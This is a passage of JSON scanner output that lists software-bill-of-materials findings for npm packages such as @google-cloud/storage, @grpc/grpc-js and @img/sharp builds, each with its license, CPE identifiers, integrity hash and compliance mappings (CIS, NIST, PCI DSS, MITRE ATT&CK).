"T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f473f0a74b429a34", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @google-cloud/promisify 4.0.0", "title": "@google-cloud/promisify 4.0.0", "description": "Package discovered: @google-cloud/promisify 4.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3927becf19e34873", "name": "@google-cloud/promisify", "version": "4.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@google-cloud\\/promisify:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google-cloud\\/promisify:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google_cloud\\/promisify:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google_cloud\\/promisify:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40google-cloud/promisify@4.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz", "integrity": "sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5c9bae4ce6812dd2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @google-cloud/storage 7.19.0", "title": "@google-cloud/storage 7.19.0", "description": "Package discovered: @google-cloud/storage 7.19.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "cefeafe40657f94b", "name": "@google-cloud/storage", "version": "7.19.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@google-cloud\\/storage:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google-cloud\\/storage:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google_cloud\\/storage:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google_cloud\\/storage:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40google-cloud/storage@7.19.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@google-cloud/storage/-/storage-7.19.0.tgz", "integrity": "sha512-n2FjE7NAOYyshogdc7KQOl/VZb4sneqPjWouSyia9CMDdMhRX5+RIbqalNmC7LOLzuLAN89VlF2HvG8na9G+zQ==", "dependencies": { "@google-cloud/paginator": "^5.0.0", "@google-cloud/projectify": "^4.0.0", "@google-cloud/promisify": "<4.1.0", "abort-controller": "^3.0.0", "async-retry": "^1.3.3", "duplexify": "^4.1.3", "fast-xml-parser": "^5.3.4", "gaxios": "^6.0.2", "google-auth-library": "^9.6.3", "html-entities": "^2.5.2", "mime": "^3.0.0", "p-limit": "^3.0.1", "retry-request": "^7.0.0", "teeny-request": "^9.0.0", "uuid": "^8.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "596d6a964fdec768", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @grpc/grpc-js 1.14.3", "title": "@grpc/grpc-js 1.14.3", "description": "Package discovered: @grpc/grpc-js 1.14.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3f87a56430ddd85e", "name": "@grpc/grpc-js", "version": "1.14.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:grpc:grpc:1.14.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/%40grpc/grpc-js@1.14.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz", "integrity": "sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA==", "dependencies": { "@grpc/proto-loader": "^0.8.0", "@js-sdsl/ordered-map": "^4.4.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "feaff3ef7cf15262", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @grpc/proto-loader 0.7.15", "title": "@grpc/proto-loader 0.7.15", "description": "Package discovered: @grpc/proto-loader 0.7.15", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "05aac3d8e010493a", "name": "@grpc/proto-loader", "version": "0.7.15", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40grpc/proto-loader@0.7.15", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.15.tgz", "integrity": "sha512-tMXdRCfYVixjuFK+Hk0Q1s38gV9zDiDJfWL3h1rv4Qc39oILCu1TRTDt7+fGUI8K4G1Fj125Hx/ru3azECWTyQ==", "dependencies": { "lodash.camelcase": "^4.3.0", "long": "^5.0.0", "protobufjs": "^7.2.5", "yargs": "^17.7.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "81837b7c5203b82b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @grpc/proto-loader 0.8.0", "title": "@grpc/proto-loader 0.8.0", "description": "Package discovered: @grpc/proto-loader 0.8.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1a954d92edb2b14f", "name": "@grpc/proto-loader", "version": "0.8.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40grpc/proto-loader@0.8.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz", "integrity": "sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ==", "dependencies": { "lodash.camelcase": "^4.3.0", "long": "^5.0.0", "protobufjs": "^7.5.3", "yargs": "^17.7.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ba1c7d59d68ea634", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/colour 1.1.0", "title": "@img/colour 1.1.0", "description": "Package discovered: @img/colour 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0b879a880de07100", "name": "@img/colour", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/colour:\\@img\\/colour:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/colour@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/colour/-/colour-1.1.0.tgz", "integrity": "sha512-Td76q7j57o/tLVdgS746cYARfSyxk8iEfRxewL9h4OMzYhbW4TAcppl0mT4eyqXddh6L/jwoM75mo7ixa/pCeQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "69b8f19d695c4a0d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-darwin-arm64 0.34.5", "title": "@img/sharp-darwin-arm64 0.34.5", "description": "Package discovered: @img/sharp-darwin-arm64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "535aeb1bbda7aba8", "name": "@img/sharp-darwin-arm64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin-arm64:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin-arm64:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin_arm64:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin_arm64:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-darwin-arm64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-darwin-arm64/-/sharp-darwin-arm64-0.34.5.tgz", "integrity": "sha512-imtQ3WMJXbMY4fxb/Ndp6HBTNVtWCUI0WdobyheGf5+ad6xX8VIDO8u2xE4qc/fr08CKG/7dDseFtn6M6g/r3w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d46a9ddb45c9c115", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-darwin-x64 0.34.5", "title": "@img/sharp-darwin-x64 0.34.5", "description": "Package discovered: @img/sharp-darwin-x64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0e26c2a4fd47f5b6", "name": "@img/sharp-darwin-x64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin-x64:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin-x64:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin_x64:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin_x64:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-darwin-x64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-darwin-x64/-/sharp-darwin-x64-0.34.5.tgz", "integrity": "sha512-YNEFAF/4KQ/PeW0N+r+aVVsoIY0/qxxikF2SWdp+NRkmMB7y9LBZAVqQ4yhGCm/H3H270OSykqmQMKLBhBJDEw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": 